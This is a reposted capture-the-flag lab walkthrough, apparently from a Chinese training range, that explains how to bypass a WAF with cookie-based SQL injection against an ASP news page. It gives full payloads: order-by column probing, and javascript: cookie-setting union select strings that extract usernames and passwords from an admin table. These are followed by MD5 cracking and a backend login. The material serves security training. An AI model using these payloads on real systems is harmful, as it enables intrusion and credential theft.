ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

公开课基础演练靶场-尤里的复仇Ⅰ 小芳!-第二章:遇到阻难!绕过WAF过滤!

2020-04-21 18:09:06  阅读:629  来源: 互联网

标签:10 WAF 阻难 公开课 cookie 169 escape id select


1.打开靶场,随便点击一个页面,带参数,猜想sql注入,单引号判断,弹出警告

 

 

 

2.看提示,and也不能用了,先用order by暴字段数,order by 10返回正常,order by 11报错,有10个字段数

 

 

3.union select也不能用,猜想是cookie注入,把参数id=169去掉后访问,报错

 

 

 

4.地址栏输入 javascript:alert(document.cookie="id="+escape("169")); 弹出对话框

 

 

 

5.再次访问http://117.167.136.245:10181/shownews.asp? 返回正常

 

 

 

6.再次验证了是cookie注入,构造语句暴出位置,并猜解表名,说明存在admin这个表

javascript:alert(document.cookie="id="+escape("169+union+select+1,2,3,4,5,6,7,8,9,10+from+admin"));

 

 

 

7.访问查看

 

 

 

8.继续,猜解字段和暴值,

javascript:alert(document.cookie="id="+escape("169+union+select+1,username,password,4,5,6,7,8,9,10+from+admin"));

 

 

 

9.查看

 

 

 

10.MD5解密得

 

 

 

11.登录后台

 

 

 

12.得到flag

 

 

 


 

标签:10,WAF,阻难,公开课,cookie,169,escape,id,select
来源: https://www.cnblogs.com/joker-vip/p/12746326.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有